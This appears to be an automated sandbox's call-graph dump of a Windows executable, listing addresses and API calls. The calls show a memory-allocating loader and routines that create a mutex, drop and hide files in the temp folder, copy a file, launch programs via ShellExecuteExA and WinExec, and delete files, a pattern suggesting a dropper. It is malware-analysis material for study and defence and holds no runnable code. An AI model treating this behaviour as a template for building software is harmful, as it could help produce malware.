40c8ae FindClose 29467->29468 29469 40c8b4 29467->29469 29468->29469 29469->29426 29471 408800 GetUserDefaultUILanguage GetLocaleInfoW 29470->29471 29471->29432 29472 42866f SetErrorMode 29473 cd0032 29483 cd0ae4 GetPEB 29473->29483 29476 cd0ae4 GetPEB 29479 cd02a7 29476->29479 29477 cd04a6 GetNativeSystemInfo 29478 cd04d3 VirtualAlloc 29477->29478 29480 cd0a9c 29477->29480 29481 cd04ec 29478->29481 29479->29477 29479->29480 29481->29480 29485 10015df0 29481->29485 29484 cd029b 29483->29484 29484->29476 29493 10015820 29485->29493 29488 10015e20 CloseHandle exit 29490 10015e6e 29488->29490 29489 10015e37 GetCurrentThread WaitForSingleObject CreateThread 29550 10015490 20 API calls 29489->29550 30293 1000b570 60 API calls 2 library calls 29489->30293 29490->29480 29492 10015e63 exit 29492->29490 29494 10015860 29493->29494 29551 10015750 GetModuleFileNameA 29494->29551 29496 10015876 29563 10015450 29496->29563 29500 100158d2 29501 10002cb0 _invalid_parameter_noinfo_noreturn 29500->29501 29502 10015973 29501->29502 29503 1001597b 29502->29503 29507 100159a2 _Smanip _Error_objects 29502->29507 29504 10002cb0 _invalid_parameter_noinfo_noreturn 29503->29504 29505 1001598a 29504->29505 29506 10002cb0 _invalid_parameter_noinfo_noreturn 29505->29506 29508 1001599c CreateMutexA GetLastError 29506->29508 29569 10012640 29507->29569 29508->29488 29508->29489 29512 10015b57 _Smanip _Error_objects 29513 10012640 9 API calls 29512->29513 29514 10015bda 29513->29514 29515 10005400 9 API calls 29514->29515 29516 10015bf1 29515->29516 29579 10013890 29516->29579 29519 10002cb0 _invalid_parameter_noinfo_noreturn 29520 10015c42 29519->29520 29582 10012620 29520->29582 29523 10002cb0 _invalid_parameter_noinfo_noreturn 29524 10015c60 29523->29524 29525 10012620 _invalid_parameter_noinfo_noreturn 29524->29525 29526 10015c6f memset 29525->29526 29527 10002b60 29526->29527 29528 10015cc0 ShellExecuteExA 29527->29528 29529 10015d13 29528->29529 29530 10015ceb 29528->29530 29533 10002cb0 _invalid_parameter_noinfo_noreturn 29529->29533 29531 10015d11 29530->29531 29532 10015cf4 WaitForSingleObject CloseHandle 29530->29532 29536 10015700 9 API calls 29531->29536 29532->29531 29534 10015d22 29533->29534 29535 10002cb0 _invalid_parameter_noinfo_noreturn 29534->29535 29537 10015d31 29535->29537 29538 10015d55 29536->29538 29539 10002cb0 _invalid_parameter_noinfo_noreturn 29537->29539 29540 10015d72 CopyFileA 29538->29540 29539->29508 29541 10002cb0 _invalid_parameter_noinfo_noreturn 29540->29541 29542 10015d84 ShellExecuteA 29541->29542 29585 10001660 GetModuleHandleA 29542->29585 29545 10002cb0 _invalid_parameter_noinfo_noreturn 29546 10015db3 29545->29546 29547 10002cb0 _invalid_parameter_noinfo_noreturn 29546->29547 29548 10015dc2 29547->29548 29549 10002cb0 _invalid_parameter_noinfo_noreturn 29548->29549 29549->29508 29550->29492 29552 10002da0 8 API calls 29551->29552 29553 10015798 29552->29553 29615 10002b10 29553->29615 29556 100157b7 29619 10002ad0 9 API calls _Error_objects 29556->29619 29558 100157cc 29560 10002cb0 _invalid_parameter_noinfo_noreturn 29558->29560 29559 100157e9 29561 10002cb0 _invalid_parameter_noinfo_noreturn 29559->29561 29562 100157e4 29560->29562 29561->29562 29562->29496 29628 10015400 29563->29628 29566 10015700 GetModuleFileNameA 29567 10002da0 8 API calls 29566->29567 29568 10015733 29567->29568 29568->29500 29570 10012660 HandleT 29569->29570 29633 10013cd0 29570->29633 29572 10012699 29573 10005400 29572->29573 29574 10005431 _Error_objects 29573->29574 29669 100127e0 29574->29669 29576 10005455 HandleT 29577 1000549d 29576->29577 29676 100128b0 29576->29676 29577->29512 29683 10014400 29579->29683 29581 100138b2 29581->29519 29708 100130b0 29582->29708 29586 10002da0 8 API calls 29585->29586 29587 100016a3 29586->29587 29713 10001510 29587->29713 29591 100016d1 29592 10002cb0 _invalid_parameter_noinfo_noreturn 29591->29592 29593 100016dc 29592->29593 29594 10002cb0 _invalid_parameter_noinfo_noreturn 29593->29594 29595 100016ee 29594->29595 29725 10001430 29595->29725 29599 10001723 29741 10003bc0 29599->29741 29601 10001748 29602 10002cd0 _invalid_parameter_noinfo_noreturn 29601->29602 29603 1000175c 29602->29603 29604 10002cb0 _invalid_parameter_noinfo_noreturn 29603->29604 29605 10001767 29604->29605 29606 10002cb0 _invalid_parameter_noinfo_noreturn 29605->29606 29607 10001776 29606->29607 29608 10002cb0 _invalid_parameter_noinfo_noreturn 29607->29608 29609 10001788 CreateThread RegisterClassW GetSystemMetrics GetSystemMetrics 29608->29609 29744 10001580 29609->29744 29809 10005760 29609->29809 29611 1000182f CreateWindowExW ShowWindow 29612 1000188a KiUserCallbackDispatcher 29611->29612 29613 100018b5 29612->29613 29614 1000189e TranslateMessage DispatchMessageW 29612->29614 29613->29545 29614->29612 29616 10002b22 Concurrency::task_continuation_context::task_continuation_context 29615->29616 29620 10003dc0 29616->29620 29618 10002b55 29618->29556 29618->29559 29619->29558 29621 10003dd3 29620->29621 29625 10003e1f _Min_value 29620->29625 29621->29625 29626 10003e90 memset 29621->29626 29623 10003de8 29623->29625 29627 10004860 memchr _Min_value char_traits 29623->29627 29625->29618 29626->29623 29627->29625 29632 100153f0 29628->29632 29630 1001541d __stdio_common_vsprintf 29631 10015439 29630->29631 29631->29566 29632->29630 29634 10013cf6 Concurrency::task_continuation_context::task_continuation_context 29633->29634 29635 10013d70 _Error_objects 29634->29635 29641 10014390 29634->29641 29635->29572 29639 10013d51 29648 10014230 _invalid_parameter_noinfo_noreturn 29639->29648 29642 1001439f 29641->29642 29645 100143a9 29642->29645 29653 10013090 ?_Xlength_error@std@@YAXPBD 29642->29653 29649 10014860 29645->29649 29647 10014ec0 memcpy HandleT 29647->29639 29648->29635 29650 10014893 Concurrency::task_continuation_context::task_continuation_context 29649->29650 29654 10004a70 29650->29654 29653->29645 29657 10004ac0 29654->29657 29658 10004ad0 allocator 29657->29658 29661 10004af0 29658->29661 29662 10004afd 29661->29662 29667 10004a81 29661->29667 29663 10004b14 29662->29663 29664 10004b06 29662->29664 29665 10001350 allocator 4 API calls 29663->29665 29668 10004b70 6 API calls allocator 29664->29668 29665->29667 29667->29647 29668->29667 29670 100127f4 29669->29670 29671 100127f6 29669->29671 29670->29576 29671->29670 29672 1001280e 29671->29672 29674 1001283c Concurrency::task_continuation_context::task_continuation_context 29671->29674 29680 10013ed0 9 API calls 3 library calls 29672->29680 29674->29670 29681 100131d0 _invalid_parameter_noinfo_noreturn memcpy HandleT _Error_objects Concurrency::task_continuation_context::task_continuation_context 29674->29681 29677 10012914 29676->29677 29678 100128cd Concurrency::task_continuation_context::task_continuation_context 29676->29678 29682 10013fe0 9 API calls 3 library calls 29677->29682 29678->29576 29680->29670 29681->29670 29682->29678 29684 1001442c _Error_objects Concurrency::task_continuation_context::task_continuation_context 29683->29684 29685 100144c7 _Error_objects Concurrency::task_continuation_context::task_continuation_context 29684->29685 29686 10014518 Concurrency::task_continuation_context::task_continuation_context 29684->29686 29701 100036d0 memcpy 29685->29701 29687 100145d3 Concurrency::task_continuation_context::task_continuation_context 29686->29687 29690 10014568 HandleT _Error_objects 29686->29690 29693 100145ee Concurrency::task_continuation_context::task_continuation_context 29687->29693 29704 10001410 ?_Xlength_error@std@@YAXPBD 29687->29704 29702 100039e0 memcpy 29690->29702 29692 100145a9 Concurrency::task_continuation_context::task_continuation_context 29703 100036d0 memcpy 29692->29703 29705 100048e0 6 API calls Concurrency::task_continuation_context::task_continuation_context 29693->29705 29696 1001462d HandleT Concurrency::task_continuation_context::task_continuation_context 29706 100036d0 memcpy 29696->29706 29698 1001467a Concurrency::task_continuation_context::task_continuation_context 29707 100036d0 memcpy 29698->29707 29700 10014507 _Error_objects 29700->29581 29701->29700 29702->29692 29703->29700 29704->29693 29705->29696 29706->29698 29707->29700 29709 100130d6 _Error_objects Concurrency::task_continuation_context::task_continuation_context 29708->29709 29711 1001262f 29709->29711 29712 10003a90 _invalid_parameter_noinfo_noreturn allocator 29709->29712 29711->29523 29712->29711 29714 10002b10 2 API calls 29713->29714 29715 1000152c 29714->29715 29716 10001535 29715->29716 29717 10001558 29715->29717 29758 10002ad0 9 API calls _Error_objects 29716->29758 29759 10002e20 29717->29759 29720 1000154a 29721 10002cd0 29720->29721 29722 10002ce2 HandleT Concurrency::task_continuation_context::task_continuation_context 29721->29722 29723 10003230 _invalid_parameter_noinfo_noreturn 29722->29723 29724 10002cea 29722->29724 29723->29724 29724->29591 29778 10002ec0 29725->29778 29727 1000146b SHGetKnownFolderPath 29728 100014e7 29727->29728 29729 1000149a wcstombs 29727->29729 29780 10002c90 10 API calls 29728->29780 29731 10002da0 8 API calls 29729->29731 29733 100014c2 29731->29733 29732 100014f4 29738 10003b90 29732->29738 29734 10002cd0 _invalid_parameter_noinfo_noreturn 29733->29734 29735 100014d1 29734->29735 29736 10002cb0 _invalid_parameter_noinfo_noreturn 29735->29736 29737 100014d9 CoTaskMemFree 29736->29737 29737->29732 29781 10002c20 29738->29781 29740 10003ba7 29740->29599 29793 10002c50 29741->29793 29743 10003bd7 29743->29601 29745 100015a2 29744->29745 29748 100015d9 _Error_objects 29744->29748 29805 10015f82 AcquireSRWLockExclusive ReleaseSRWLockExclusive SleepConditionVariableSRW 29745->29805 29747 100015ac 29747->29748 29806 1001631a _crt_atexit _register_onexit_function _Error_objects 29747->29806 29797 10003ac0 29748->29797 29751 100015cc 29807 10015f31 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 29751->29807 29752 10001629 29801 10002980 29752->29801 29755 1000163a 29756 10002960 _invalid_parameter_noinfo_noreturn 29755->29756 29757 10001642 29756->29757 29757->29611 29758->29720 29760 10002e4c HandleT Concurrency::task_continuation_context::task_continuation_context 29759->29760 29763 10004020 29760->29763 29762 10002e9e 29762->29720 29764 10004037 Concurrency::task_continuation_context::task_continuation_context 29763->29764 29766 10004041 Concurrency::task_continuation_context::task_continuation_context 29764->29766 29774 10001410 ?_Xlength_error@std@@YAXPBD 29764->29774 29767 1000406b 29766->29767 29769 1000409b Concurrency::task_continuation_context::task_continuation_context 29766->29769 29775 100036d0 memcpy 29767->29775 29776 100048e0 6 API calls Concurrency::task_continuation_context::task_continuation_context 29769->29776 29771 100040c2 HandleT Concurrency::task_continuation_context::task_continuation_context 29777 100036d0 memcpy 29771->29777 29773 1000408d _Error_objects 29773->29762 29774->29766 29775->29773 29776->29771 29777->29773 29779 10002ef1 _Error_objects 29778->29779 29779->29727 29780->29732 29782 10002c30 HandleT 29781->29782 29785 100032f0 29782->29785 29784 10002c49 29784->29740 29786 10003310 Concurrency::task_continuation_context::task_continuation_context 29785->29786 29787 1000335d 29785->29787 29791 100039e0 memcpy 29786->29791 29792 10004150 9 API calls 3 library calls 29787->29792 29789 1000333b Concurrency::task_continuation_context::task_continuation_context 29789->29784 29791->29789 29792->29789 29794 10002c6a Concurrency::task_continuation_context::task_continuation_context 29793->29794 29795 100032f0 10 API calls 29794->29795 29796 10002c7d 29795->29796 29796->29743 29799 10003af5 HandleT 29797->29799 29798 10003b32 29798->29752 29799->29798 29808 100046f0 8 API calls 2 library calls 29799->29808 29802 10002992 HandleT Concurrency::task_continuation_context::task_continuation_context 29801->29802 29803 10002fb0 _invalid_parameter_noinfo_noreturn 29802->29803 29804 1000299a 29802->29804 29803->29804 29804->29755 29805->29747 29806->29751 29807->29748 29808->29798 29810 10005798 29809->29810 29811 10002da0 8 API calls 29810->29811 29812 100057ae 29811->29812 29813 10002e20 8 API calls 29812->29813 29814 100057c5 _Smanip _Error_objects 29813->29814 29815 10012640 9 API calls 29814->29815 29816 10005e28 _Smanip _Error_objects 29815->29816 29817 10012640 9 API calls 29816->29817 29818 1000a1cb 29817->29818 29819 10005400 9 API calls 29818->29819 29820 1000a1e2 29819->29820 29821 10005400 9 API calls 29820->29821 29822 1000a1fc _Error_objects 29821->29822 30089 10004fe0 29822->30089 29825 10002cd0 _invalid_parameter_noinfo_noreturn 29826 1000a253 29825->29826 29827 10002cb0 _invalid_parameter_noinfo_noreturn 29826->29827 29828 1000a25e 29827->29828 29829 10004fe0 17 API calls 29828->29829 29830 1000a272 29829->29830 29831 10002cd0 _invalid_parameter_noinfo_noreturn 29830->29831 29832 1000a28d 29831->29832 29833 10002cb0 _invalid_parameter_noinfo_noreturn 29832->29833 29834 1000a298 GetTempPathA 29833->29834 29836 10002da0 8 API calls 29834->29836 29837 1000a373 _Smanip _Error_objects 29836->29837 29838 10012640 9 API calls 29837->29838 29839 1000a3fc 29838->29839 29840 10005400 9 API calls 29839->29840 29841 1000a413 29840->29841 29842 10012620 _invalid_parameter_noinfo_noreturn 29841->29842 29843 1000a425 29842->29843 29844 10002e20 8 API calls 29843->29844 29845 1000a44b 29844->29845 30113 10005250 29845->30113 29847 1000a457 _Smanip _Error_objects 29848 10012640 9 API calls 29847->29848 29849 1000a50d 29848->29849 29850 10005400 9 API calls 29849->29850 29851 1000a524 29850->29851 30120 100138d0 29851->30120 29853 1000a557 29854 10002cb0 _invalid_parameter_noinfo_noreturn 29853->29854 29855 1000a569 29854->29855 29856 10012620 _invalid_parameter_noinfo_noreturn 29855->29856 29857 1000a578 29856->29857 30123 10005520 DeleteFileA 29857->30123 29859 1000a58a 29860 10002da0 8 API calls 29859->29860 29861 1000a5a4 29860->29861 30125 10005300 29861->30125 29864 10002cb0 _invalid_parameter_noinfo_noreturn 29865 1000a5cd Sleep 29864->29865 29866 1000a5e5 29865->29866 29867 10002da0 8 API calls 29866->29867 29868 1000a5f1 _Smanip _Error_objects 29867->29868 29869 10012640 9 API calls 29868->29869 29870 1000a666 29869->29870 29871 10005400 9 API calls 29870->29871 29872 1000a67d 29871->29872 29873 10002e20 8 API calls 29872->29873 29874 1000a6c7 29873->29874 29875 10005250 13 API calls 29874->29875 29876 1000a6d3 29875->29876 29877 10002cb0 _invalid_parameter_noinfo_noreturn 29876->29877 29878 1000a6eb 29877->29878 29879 10012620 _invalid_parameter_noinfo_noreturn 29878->29879 29880 1000a6fa 29879->29880 29881 10002cb0 _invalid_parameter_noinfo_noreturn 29880->29881 29882 1000a709 29881->29882 29883 10002da0 8 API calls 29882->29883 29884 1000a721 _Smanip _Error_objects 29883->29884 29885 10012640 9 API calls 29884->29885 29886 1000a79a 29885->29886 29887 10005400 9 API calls 29886->29887 29888 1000a7b1 29887->29888 29889 10002e20 8 API calls 29888->29889 29890 1000a7fb 29889->29890 29891 10005250 13 API calls 29890->29891 29892 1000a807 29891->29892 29893 10002cd0 _invalid_parameter_noinfo_noreturn 29892->29893 29894 1000a82e 29893->29894 29895 10002cb0 _invalid_parameter_noinfo_noreturn 29894->29895 29896 1000a839 29895->29896 29897 10002cb0 _invalid_parameter_noinfo_noreturn 29896->29897 29898 1000a848 29897->29898 29899 10012620 _invalid_parameter_noinfo_noreturn 29898->29899 29900 1000a857 29899->29900 29901 10002cb0 _invalid_parameter_noinfo_noreturn 29900->29901 29902 1000a866 29901->29902 30136 100139a0 29902->30136 29906 1000a8ad 29907 10013a30 9 API calls 29906->29907 29908 1000a8db 29907->29908 29909 10013a30 9 API calls 29908->29909 29910 1000a909 29909->29910 29911 10013a30 9 API calls 29910->29911 29912 1000a937 29911->29912 29913 10013a30 9 API calls 29912->29913 29914 1000a965 29913->29914 29915 10013a30 9 API calls 29914->29915 29916 1000a993 29915->29916 29917 10013a30 9 API calls 29916->29917 29918 1000a9c1 29917->29918 29919 10013a30 9 API calls 29918->29919 29920 1000a9ef 29919->29920 29921 10013a30 9 API calls 29920->29921 29922 1000aa1d 29921->29922 29923 10013a30 9 API calls 29922->29923 29924 1000aa4b 29923->29924 29925 10013a30 9 API calls 29924->29925 29926 1000aa79 29925->29926 29927 10002cb0 _invalid_parameter_noinfo_noreturn 29926->29927 29928 1000aa8b 29927->29928 29929 10002cb0 _invalid_parameter_noinfo_noreturn 29928->29929 29930 1000aa9a 29929->29930 29931 10002cb0 _invalid_parameter_noinfo_noreturn 29930->29931 29932 1000aaa9 29931->29932 29933 10002cb0 _invalid_parameter_noinfo_noreturn 29932->29933 29934 1000aab8 29933->29934 29935 10002cb0 _invalid_parameter_noinfo_noreturn 29934->29935 29936 1000aac7 29935->29936 29937 10002cb0 _invalid_parameter_noinfo_noreturn 29936->29937 29938 1000aad6 29937->29938 29939 10002cb0 _invalid_parameter_noinfo_noreturn 29938->29939 29940 1000aae5 29939->29940 29941 10002cb0 _invalid_parameter_noinfo_noreturn 29940->29941 29942 1000aaf4 29941->29942 29943 10002cb0 _invalid_parameter_noinfo_noreturn 29942->29943 29944 1000ab03 29943->29944 29945 10002cb0 _invalid_parameter_noinfo_noreturn 29944->29945 29946 1000ab12 29945->29946 29947 10002cb0 _invalid_parameter_noinfo_noreturn 29946->29947 29948 1000ab21 29947->29948 29949 10005520 DeleteFileA 29948->29949 29950 1000ab33 29949->29950 29951 10002da0 8 API calls 29950->29951 29952 1000ab4d 29951->29952 29953 10005300 31 API calls 29952->29953 29954 1000ab64 29953->29954 29955 10002cb0 _invalid_parameter_noinfo_noreturn 29954->29955 29956 1000ab76 Sleep 29955->29956 29957 1000ab8e _Smanip _Error_objects 29956->29957 29958 10012640 9 API calls 29957->29958 29959 1000addd 29958->29959 29960 10005400 9 API calls 29959->29960 29961 1000adf4 _Smanip _Error_objects 29960->29961 29962 10012640 9 API calls 29961->29962 29963 1000ae9a 29962->29963 29964 10005400 9 API calls 29963->29964 29965 1000aeb1 29964->29965 29966 10013890 9 API calls 29965->29966 29967 1000aef0 29966->29967 29968 10002cb0 _invalid_parameter_noinfo_noreturn 29967->29968 29969 1000af02 29968->29969 29970 10012620 _invalid_parameter_noinfo_noreturn 29969->29970 29971 1000af11 29970->29971 29972 10002cb0 _invalid_parameter_noinfo_noreturn 29971->29972 29973 1000af20 29972->29973 29974 10012620 _invalid_parameter_noinfo_noreturn 29973->29974 29975 1000af2f 29974->29975 29976 1000af3d WinExec Sleep 29975->29976 29977 1000af5b _Smanip _Error_objects 29976->29977 29978 10012640 9 API calls 29977->29978 29979 1000b07c 29978->29979 29980 10005400 9 API calls 29979->29980 29981 1000b093 29980->29981 29982 10012620 _invalid_parameter_noinfo_noreturn 29981->29982 29983 1000b0a5 _Smanip _Error_objects 29982->29983 29984 10012640 9 API calls 29983->29984 29985 1000b118 29984->29985 29986 10005400 9 API calls 29985->29986 29987 1000b12f 29986->29987 29988 10003bc0 10 API calls 29987->29988 29989 1000b162 29988->29989 29990 10003b90 10 API calls 29989->29990 29991 1000b1a1 29990->29991 29992 10002cd0 _invalid_parameter_noinfo_noreturn 29991->29992 29993 1000b1bc 29992->29993 29994 10002cb0 _invalid_parameter_noinfo_noreturn 29993->29994 29995 1000b1c7 29994->29995 29996 10002cb0 _invalid_parameter_noinfo_noreturn 29995->29996 29997 1000b1d6 29996->29997 29998 10002cb0 _invalid_parameter_noinfo_noreturn 29997->29998 29999 1000b1e5 29998->29999 30000 10012620 _invalid_parameter_noinfo_noreturn 29999->30000 30001 1000b1f4 memset 30000->30001 30002 10002b60 30001->30002 30003 1000b245 ShellExecuteExA 30002->30003 30004 1000b270 30003->30004 30005 1000b29b 30003->30005 30007 1000b296 30004->30007 30008 1000b279 WaitForSingleObject CloseHandle 30004->30008 30006 10002cb0 _invalid_parameter_noinfo_noreturn 30005->30006 30009 1000b2b4 30006->30009 30010 1000b3a3 Sleep 30007->30010 30063 1000b548 30007->30063 30008->30007 30012 10002cb0 _invalid_parameter_noinfo_noreturn 30009->30012 30011 1000b3ba 30010->30011 30014 10002da0 8 API calls 30011->30014 30013 1000b2c3 30012->30013 30015 10002cb0 _invalid_parameter_noinfo_noreturn 30013->30015 30016 1000b3c6 30014->30016 30017 1000b2d2 30015->30017 30145 10005740 30016->30145 30019 10002cb0 _invalid_parameter_noinfo_noreturn 30017->30019 30021 1000b2e1 30019->30021 30020 1000b3d6 30022 10002cb0 _invalid_parameter_noinfo_noreturn 30020->30022 30023 10002cb0 _invalid_parameter_noinfo_noreturn 30021->30023 30025 1000b3e8 30022->30025 30024 1000b2f0 30023->30024 30026 10002cb0 _invalid_parameter_noinfo_noreturn 30024->30026 30029 10002da0 8 API calls 30025->30029 30027 1000b2ff 30026->30027 30028 10002cb0 _invalid_parameter_noinfo_noreturn 30027->30028 30030 1000b30e 30028->30030 30031 1000b400 30029->30031 30032 10002cb0 _invalid_parameter_noinfo_noreturn 30030->30032 30033 10005740 SetFileAttributesA 30031->30033 30034 1000b31d 30032->30034 30035 1000b410 30033->30035 30036 10002cb0 _invalid_parameter_noinfo_noreturn 30034->30036 30037 10002cb0 _invalid_parameter_noinfo_noreturn 30035->30037 30038 1000b32c 30036->30038 30039 1000b422 30037->30039 30040 10002cb0 _invalid_parameter_noinfo_noreturn 30038->30040 30042 10005520 DeleteFileA 30039->30042 30041 1000b33b 30040->30041 30043 10002cb0 _invalid_parameter_noinfo_noreturn 30041->30043 30044 1000b434 30042->30044 30045 1000b34a 30043->30045 30048 10005520 DeleteFileA 30044->30048 30046 10002cb0 _invalid_parameter_noinfo_noreturn 30045->30046 30047 1000b359 30046->30047 30049 10012620 _invalid_parameter_noinfo_noreturn 30047->30049 30051 1000b448 30048->30051 30050 1000b368 30049->30050 30052 10012620 _invalid_parameter_noinfo_noreturn 30050->30052 30053 10002cb0 _invalid_parameter_noinfo_noreturn 30051->30053 30054 1000b377 30052->30054 30055 1000b464 30053->30055 30056 10002cb0 _invalid_parameter_noinfo_noreturn 30054->30056 30057 10002cb0 _invalid_parameter_noinfo_noreturn 30055->30057 30058 1000b386 30056->30058 30059 1000b473 30057->30059 30060 10002cb0 _invalid_parameter_noinfo_noreturn 30058->30060 30061 10002cb0 _invalid_parameter_noinfo_noreturn 30059->30061 30060->30007 30062 1000b482 30061->30062 30064 10002cb0 _invalid_parameter_noinfo_noreturn 30062->30064 30065 1000b491 30064->30065 30066 10002cb0 _invalid_parameter_noinfo_noreturn 30065->30066 30067 1000b4a0 30066->30067 30068 10002cb0 _invalid_parameter_noinfo_noreturn 30067->30068 30069 1000b4af 30068->30069 30070 10002cb0 _invalid_parameter_noinfo_noreturn 30069->30070 30071 1000b4be 30070->30071 30072 10002cb0 _invalid_parameter_noinfo_noreturn 30071->30072 30073 1000b4cd 30072->30073 30074 10002cb0 _invalid_parameter_noinfo_noreturn 30073->30074 30075 1000b4dc 30074->30075 30076 10002cb0 _invalid_parameter_noinfo_noreturn 30075->30076 30077 1000b4eb 30076->30077 30078 10002cb0 _invalid_parameter_noinfo_noreturn 30077->30078 30079 1000b4fa 30078->30079 30080 10002cb0 _invalid_parameter_noinfo_noreturn 30079->30080 30081 1000b509 30080->30081 30082 10012620 _invalid_parameter_noinfo_noreturn 30081->30082 30083 1000b518 30082->30083 30084 10012620 _invalid_parameter_noinfo_noreturn 30083->30084 30085 1000b527 30084->30085 30086 10002cb0 _invalid_parameter_noinfo_noreturn 30085->30086 30087 1000b536 30086->30087 30088 10002cb0 _invalid_parameter_noinfo_noreturn 30087->30088 30088->30063 30090 1000500a 30089->30090 30148 100125c0 30090->30148 30093 10005028 30095 100050db _Error_objects 30093->30095 30164 10012600 9 API calls 30093->30164 30094 100050c9 30094->30095 30096 100050f7 30094->30096 30097 1000512c 30094->30097 30154 100137c0 30095->30154 30165 10012600 9 API calls 30096->30165 30166 10012600 9 API calls 30097->30166 30101 100051dd 30158 10004ee0 MultiByteToWideChar 30101->30158 30102 1000515c 30167 10012600 9 API calls 30102->30167 30104 1000518a 30106 100051ef 30107 10002da0 8 API calls 30106->30107 30108 10005201 _MallocaArrayHolder 30107->30108 30109 10002cb0 _invalid_parameter_noinfo_noreturn 30108->30109 30110 1000522b 30109->30110 30111 10012620 _invalid_parameter_noinfo_noreturn 30110->30111 30112 1000523a 30111->30112 30112->29825 30116 10005280 30113->30116 30115 100052c2 30117 10002cb0 _invalid_parameter_noinfo_noreturn 30115->30117 30116->30115 30172 10012780 30116->30172 30176 100129e0 11 API calls Concurrency::task_continuation_context::task_continuation_context 30116->30176 30119 100052e6 30117->30119 30119->29847 30184 100143c0 30120->30184 30122 100138e9 30122->29853 30124 10005531 30123->30124 30124->29859 30209 100124a0 30125->30209 30128 100053a7 30218 100053d0 30128->30218 30130 100053b9 30130->29864 30131 10005357 30132 1000536f ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J 30131->30132 30213 10012400 30132->30213 30134 10005395 30135 1000539f SetFileAttributesA 30134->30135 30135->30128 30137 100139b5 HandleT Concurrency::task_continuation_context::task_continuation_context 30136->30137 30138 100139e5 30137->30138 30289 10001410 ?_Xlength_error@std@@YAXPBD 30137->30289 30281 100146c0 30138->30281 30141 1000a87f 30142 10013a30 30141->30142 30143 100128b0 Concurrency::task_continuation_context::task_continuation_context 9 API calls 30142->30143 30144 10013a48 30143->30144 30144->29906 30146 10002b60 30145->30146 30147 10005750 SetFileAttributesA 30146->30147 30147->30020 30149 100125cf 30148->30149 30150 100125e6 30149->30150 30153 100125f3 30149->30153 30168 10013090 ?_Xlength_error@std@@YAXPBD 30149->30168 30169 10013b70 8 API calls Concurrency::task_continuation_context::task_continuation_context 30150->30169 30153->30093 30156 100137f5 HandleT 30154->30156 30155 10013832 _Error_objects 30155->30101 30156->30155 30170 10014ab0 9 API calls 2 library calls 30156->30170 30171 10016360 30158->30171 30160 10004f1b memset MultiByteToWideChar WideCharToMultiByte 30161 10016360 30160->30161 30162 10004f7e memset WideCharToMultiByte 30161->30162 30163 10004fc2 _MallocaArrayHolder 30162->30163 30163->30106 30164->30094 30165->30095 30166->30102 30167->30104 30168->30150 30169->30153 30170->30155 30173 1001279a Concurrency::task_continuation_context::task_continuation_context 30172->30173 30177 10013e30 30173->30177 30176->30116 30178 10013e3e 30177->30178 30180 100127ca 30177->30180 30178->30180 30182 100049b0 memchr 30178->30182 30183 100049e0 memcmp 30178->30183 30180->30116 30182->30178 30183->30178 30185 100143da Concurrency::task_continuation_context::task_continuation_context 30184->30185 30188 100148c0 30185->30188 30200 10003980 30188->30200 30191 100149bc 30207 10014ff0 9 API calls 3 library calls 30191->30207 30193 100143f1 30193->30122 30194 1001490e Concurrency::task_continuation_context::task_continuation_context 30204 100039e0 memcpy 30194->30204 30196 10014980 30205 100036d0 memcpy 30196->30205 30198 10014994 30206 100036d0 memcpy 30198->30206 30201 10003992 30200->30201 30202 10003997 30200->30202 30208 10003a70 ?_Xout_of_range@std@@YAXPBD 30201->30208 30202->30191 30202->30194 30204->30196 30205->30198 30206->30193 30207->30193 30208->30202 30210 100124bb 30209->30210 30221 10012f80 30210->30221 30251 10012f10 30213->30251 30216 10012434 30216->30134 30217 10012418 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 30217->30216 30271 10012440 30218->30271 30220 100053e2 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 30220->30130 30222 10012fd0 HandleT 30221->30222 30223 10012fab ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE 30221->30223 30224 10012fe0 ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N 30222->30224 30223->30222 30231 10013680 ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE 30224->30231 30228 1001304f 30229 10013053 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 30228->30229 30230 10005333 ??Bios_base@std@ 30228->30230 30229->30230 30230->30128 30230->30131 30243 10012e40 30231->30243 30234 100135c0 30235 100135e7 30234->30235 30236 100135eb ?_Fiopen@std@@YAPAU_iobuf@@PBDHH 30234->30236 30235->30228 30236->30235 30237 1001360d 30236->30237 30238 10012e40 3 API calls 30237->30238 30239 1001361b ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2 30238->30239 30249 10013a70 8 API calls 30239->30249 30241 10013642 30250 10012cd0 ?always_noconv@codecvt_base@std@ ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ HandleT 30241->30250 30244 10012e4f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 30243->30244 30246 10012e7f 30244->30246 30247 10012ede 30244->30247 30246->30247 30248 10012e88 _get_stream_buffer_pointers ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAPAD0PAH001 30246->30248 30247->30234 30248->30247 30249->30241 30250->30235 30252 10012f22 30251->30252 30254 10012f5a 30251->30254 30261 10012c90 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 30252->30261 30256 10012e40 3 API calls 30254->30256 30258 10012414 30256->30258 30258->30216 30258->30217 30262 10012cc9 30261->30262 30263 10012caa ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 30261->30263 30264 10012d20 30262->30264 30263->30262 30265 10012d32 Concurrency::task_continuation_context::task_continuation_context 30264->30265 30270 10012d3d fclose 30264->30270 30266 10012d8a ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD 30265->30266 30265->30270 30267 10012dbf 30266->30267 30268 10012de1 fwrite 30267->30268 30267->30270 30269 10012e00 30268->30269 30268->30270 30269->30270 30270->30254 30274 10012390 30271->30274 30273 10012482 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE 30273->30220 30275 100123c6 30274->30275 30276 100123be 30274->30276 30277 100123db ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE 30275->30277 30279 10012f10 8 API calls 30275->30279 30278 10012c90 2 API calls 30276->30278 30277->30273 30278->30275 30280 100123da 30279->30280 30280->30277 30286 100146ec HandleT 